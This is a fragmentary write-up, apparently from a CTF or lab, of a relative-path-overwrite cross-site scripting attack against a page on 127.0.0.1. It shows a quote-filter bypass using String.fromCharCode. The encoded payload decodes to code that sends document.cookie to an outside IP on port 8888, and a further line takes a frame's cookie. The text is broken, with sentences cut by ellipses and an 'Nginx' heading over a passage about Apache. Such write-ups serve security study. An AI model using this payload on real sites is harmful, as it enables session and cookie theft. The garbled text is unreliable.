Nginx
URL and response
http://127.0.0.1/rpo/yang/index.php # page returns normally
http://127.0.0.1/rpo/yang%2findex.php...Apache does not treat '%2f' as '/', so it looks in the rpo directory for a file named yang%2findex.php. The server clearly has no such file, so it returns not found...- Wait for the response.
Because quotes are filtered, String.fromCharCode (which decodes ASCII codes) is used to bypass the filter....110,101,119,32,73,109,97,103,101,40,41,46,115,114,99,61,34,104,116,116,112,58,47,47,49,53,48,46,57,53,46,49,55,52,46,50,52,53,58,56,56,56,56,63,97,61,34,43,101,110,99,111,100,101,85,82,73,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59));
Response received...a="+document.getElementById("frame").contentWindow.document.cookie;
}
After submitting, the response is received
Done!